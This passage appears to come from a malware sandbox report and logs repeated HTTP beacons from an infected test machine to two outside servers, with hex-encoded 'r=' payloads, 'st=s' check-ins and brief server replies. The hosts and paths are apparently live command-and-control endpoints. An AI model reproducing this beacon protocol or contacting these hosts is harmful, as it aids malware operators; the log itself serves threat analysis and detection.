                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1220192.168.2.551074193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.166915894 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.414800882 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1221192.168.2.551075193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.325860023 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.581305027 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1222192.168.2.551076193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.673603058 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.922187090 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1223192.168.2.551077193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:35.941675901 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:36.184034109 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1224192.168.2.551078193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:36.272294044 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:36.516016006 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1225192.168.2.551079193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:36.436057091 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:36.688322067 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1226192.168.2.551080193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:36.766957045 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.017410040 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1227192.168.2.551081193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.040606976 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.288063049 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1228192.168.2.551082193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.376327038 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.622548103 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1229192.168.2.551083193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.538708925 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.788729906 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1230192.168.2.551084193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:37.884143114 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.139626026 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1231192.168.2.551085193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.142107964 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.385305882 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1232192.168.2.551086193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.482996941 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.730781078 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1233192.168.2.551087193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.633083105 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.888719082 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1234192.168.2.551088193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.979229927 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.228060007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1235192.168.2.551089193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.240979910 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.486638069 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1236192.168.2.551090193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.565763950 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.806438923 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1237192.168.2.551091193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:39.739773035 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
